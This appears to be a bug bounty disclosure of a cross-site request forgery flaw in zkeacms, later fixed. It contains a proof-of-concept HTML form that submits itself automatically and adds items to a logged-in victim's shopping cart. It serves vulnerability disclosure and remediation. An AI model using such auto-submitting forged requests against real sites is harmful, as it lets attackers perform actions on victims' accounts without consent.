Cross-Site Request Forgery (CSRF) in seriawei/zkeacms

Valid

Reported on

Jul 17th 2021

✍️ Description

ZKEACMS is vulnerable to Cross-site request forgery. The app has no mechanism against CSRF in all HTTP requests.

🕵️‍♂️ Proof of Concept

Sample: Add products to the shopping cart.

HTML content:

<form id="form" action="http://localhost:5000/Basket/Add" method="POST">
  <input id="product" type="text" name="productId" value="2">
  <input type="text" name="quantity" value="10">
  <input type="submit">
</form>

<script>
  setTimeout(() => { form.submit() }, 2000);
</script>

Save the above content into an HTML file.
With an authenticated user, open the HTML file.
Check the shopping cart.

PoC video.

💥 Impact

When a victim access a malicious page, it is possible to perform any action which compromises the victim's account.

Occurrences

ArticleApiController.cs L43

We have contacted a member of the seriawei/zkeacms team and are waiting to hear back 2 years ago

Wayne marked this as fixed with commit 5c871c 2 years ago

Wayne has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation

We have contacted a member of the seriawei/zkeacms team and are waiting to hear back 2 years ago

Wayne marked this as fixed with commit 5c871c 2 years ago

Wayne has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation